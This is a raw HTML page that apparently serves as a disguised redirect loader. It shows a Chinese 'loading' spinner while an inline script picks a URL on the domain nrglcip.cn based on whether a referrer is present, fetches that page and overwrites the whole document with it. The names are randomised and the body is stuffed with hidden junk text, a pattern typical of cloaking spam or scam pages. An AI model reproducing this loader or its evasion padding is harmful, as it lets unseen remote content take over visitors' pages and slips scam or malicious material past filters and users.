<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Nc0uWNKlqS {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Nc0uWNKlqS .f1iwLrANm {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Nc0uWNKlqS .content {
            line-height: 50px;
            text-align: center
        }

        .Nc0uWNKlqS .img {
            width: 100%
        }

        .Nc0uWNKlqS .y5JvS9 {
            text-align: center
        }

        .Nc0uWNKlqS .y5JvS9 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Nc0uWNKlqS .y5JvS9 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Nc0uWNKlqS .y5JvS9 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Nc0uWNKlqS .y5JvS9 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Nc0uWNKlqS .y5JvS9 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Nc0uWNKlqS .y5JvS9 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Nc0uWNKlqS .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function g6P6cStZjH(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var q6X0dWj = g6P6cStZjH('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ q6X0dWj +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ q6X0dWj +".html?a=share";
		}
		
        jQcJCZ=url+"#"+new Date().getTime();
        jQcJCZ && function() {
            $.get(jQcJCZ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >IcFPYws47hOu78D43lcKBP7RUkCKkURpwptZlGAz1FJpzbvz</li>
<p  style='display:none'>aUCwIdvycxYJI9c9jMNyQyZFmoDm9FGHBo44xAouWL4wkf7cZaAruhH9ntjDpdfl6GP9Q6ix</p>
<div style='display:none'>FtC7Gf3HPRuYIkzATxe1rpR4kAcHqXiIXJO5NoMyddjeOZSSRGU1ER</div>
<span style='display:none'>WJLK57YsGXhHt7yawcowOnp6beFUzz58hdIlpWHPQX71y94GhHIzNA1UUgVQ9</span><div class="Nc0uWNKlqS">
    <div class="f1iwLrANm">
        <div class="y5JvS9">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>Y76ZrtSzosqXesBsHcDtJBGMVWdynZiPl5Bw7F7ZtegU3Raymw1PNsXvLOFdQqsMVKJKsegOnauqW9r8fskFeCURIp</span>
<img  src='' style='display:none'>
<h1 style='display:none' >odRcCt6VOz4KmSMEjh48G9l5bYZuF6c2V</h1>
<p  style='display:none'>tj6FIaxzOishzmYPTfHzL0qK1wSMqjJ1DGCvVolpxnlGV35KwmHDNv5GdgpsGPlSgBhHHuRlCe1xjMnc6mfFSbEympwVTa1eYop</p>
<span style='display:none'>Y76ZrtSzosqXesBsHcDtJBGMVWdynZiPl5Bw7F7ZtegU3Raymw1PNsXvLOFdQqsMVKJKsegOnauqW9r8fskFeCURIp</span>
<b style='display:none' >n41l73wF0MHYgqaauDqLXxeLGmLhLeXxwmRUdaDKU5q6V5rJWGOiMixh2zArGIpWZIxpBtsrX4dr3AIR9istQQ</b>
<div style='display:none'>wWsPrA7r0trk9eMHfe8sKHmKj3IsDT5HFok2ApH2vS0vHk69kAIvvQy6V0FS5f8Wx8klsLhwfufe6k6Jblk</div>
<a  href='#' style='display:none'>FAsyb5gaZX0aHWGW3Pz1iGhAO</a>
<a  href='#' style='display:none'>FAsyb5gaZX0aHWGW3Pz1iGhAO</a></body>
</html>